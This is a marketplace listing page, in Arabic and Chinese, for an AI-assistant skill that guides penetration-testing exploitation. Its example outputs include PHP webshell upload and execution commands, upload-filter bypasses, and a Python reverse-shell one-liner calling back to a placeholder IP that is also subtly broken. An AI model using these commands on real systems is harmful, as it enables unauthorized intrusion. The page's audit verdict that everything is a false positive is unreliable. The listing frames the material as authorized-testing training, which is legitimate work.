المهارات exploitation-knowledge
🎯

exploitation-knowledge

آمن 🌐 الوصول إلى الشبكة⚙️ الأوامر الخارجية📁 الوصول إلى نظام الملفات

应用渗透测试利用技术

此技能为授权渗透测试期间的漏洞利用和初始访问提供结构化指导。涵盖利用发现、适配、shell建立以及使用行业标准工具和方法捕获用户标志。

يدعم: Claude Code(CC)
📊 69 كافٍ
1

تنزيل ZIP المهارة

2

رفع في Claude

اذهب إلى Settings → Capabilities → Skills → Upload skill

3

فعّل وابدأ الاستخدام

اختبرها

استخدام "exploitation-knowledge". 我发现了一个PHP文件上传端点。帮我利用它实现RCE。

النتيجة المتوقعة:

  • 使用curl上传PHP webshell: curl -F 'file=@shell.php' http://target/upload.php
  • 尝试扩展名绕过: shell.php5, shell.phtml, shell.php.jpg
  • 暴力破解uploads目录: gobuster dir -u http://target/uploads -x php
  • 通过以下方式执行命令: curl http://target/uploads/shell.php?cmd=id
  • 如果过滤阻止字符,对载荷使用base64编码

استخدام "exploitation-knowledge". 我需要建立反向shell但目标只有python3可用。

النتيجة المتوقعة:

  • 使用python3反向shell: python3 -c 'import socket,subprocess,os;s=s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
  • 首先启动监听器: nc -lvnp 4444
  • 如果目标有python但没有python3,使用: python -c '...相同语法...'

التدقيق الأمني

آمن
v5 • 1/16/2026

This is a pure documentation/methodology knowledge base for penetration testing education. The static scanner flagged 154 patterns found in documentation examples (tool references, command syntax, IP addresses) but failed to recognize the educational context. All findings are FALSE POSITIVES - this skill contains only written guidance about exploitation techniques, no executable code, no network operations, and no file system access. Content is consistent with authorized security research and industry-standard pentesting methodology used by security professionals on platforms like HackTheBox.

2
الملفات التي تم فحصها
701
الأسطر التي تم تحليلها
3
النتائج
5
إجمالي عمليات التدقيق

عوامل الخطر

🌐 الوصول إلى الشبكة (28)
⚙️ الأوامر الخارجية (76)
📁 الوصول إلى نظام الملفات (11)
تم تدقيقه بواسطة: claude عرض سجل التدقيق →

درجة الجودة

38
الهندسة المعمارية
100
قابلية الصيانة
87
المحتوى
20
المجتمع
100
الأمان
87
الامتثال للمواصفات

ماذا يمكنك بناءه

在漏洞靶机上练习

在HackTheBox或VulnHub机器上测试时应用结构化利用方法论以提升技能

执行初始访问阶段

在授权渗透测试任务中遵循一致的程序以获得命令执行权限

学习利用技术

学习反向shell、Web漏洞利用和权限提升向量的文档化方法论

جرّب هذه الموجهات

利用特定服务
我发现80端口运行着Apache Struts 2.3。帮我找到并适配一个漏洞利用代码以获得初始访问。
建立反向shell
我在目标上有RCE但nc不可用。python3有哪些可用的反向shell选项?
测试Web漏洞
目标在/upload.php有一个上传表单。我该如何测试RCE以及应该尝试哪些绕过技术?
诊断利用失败
我的漏洞利用代码运行了但没有shell出现。监听器在4444端口运行。我该如何诊断出了什么问题?

أفضل الممارسات

  • 在触发漏洞利用前始终设置监听器以捕获反向shell
  • 在您的环境中运行漏洞利用代码前先阅读并理解它
  • 系统性地诊断失败原因而不是重复尝试相同方法

تجنب

  • 在不理解漏洞利用代码作用的情况下就运行它
  • 依赖单一漏洞利用来源而不是多来源搜索
  • 假设相同的漏洞利用无需环境适配就能工作

الأسئلة المتكررة

哪些AI工具支持此技能?
此技能适用于Claude和Claude Code,用于提供结构化渗透测试指导。
此知识库的限制是什么?
它提供方法论指导,但不执行自动化扫描或利用。
我可以将其与其他工具集成吗?
可以,结合侦察技能可实现从发现到利用的完整渗透测试工作流程。
使用此技能时我的数据安全吗?
这是一个基于提示的技能,没有代码执行或数据收集。所有处理都在本地进行。
为什么我的漏洞利用失败且无响应?
常见原因包括防火墙阻止、目标错误或缺少依赖项。使用技能中的诊断框架。
这与Metasploit有何不同?
此技能指导手动利用技术,而Metasploit是自动化框架。两者可以一起使用。

تفاصيل المطور

بنية الملفات

📄 SKILL.md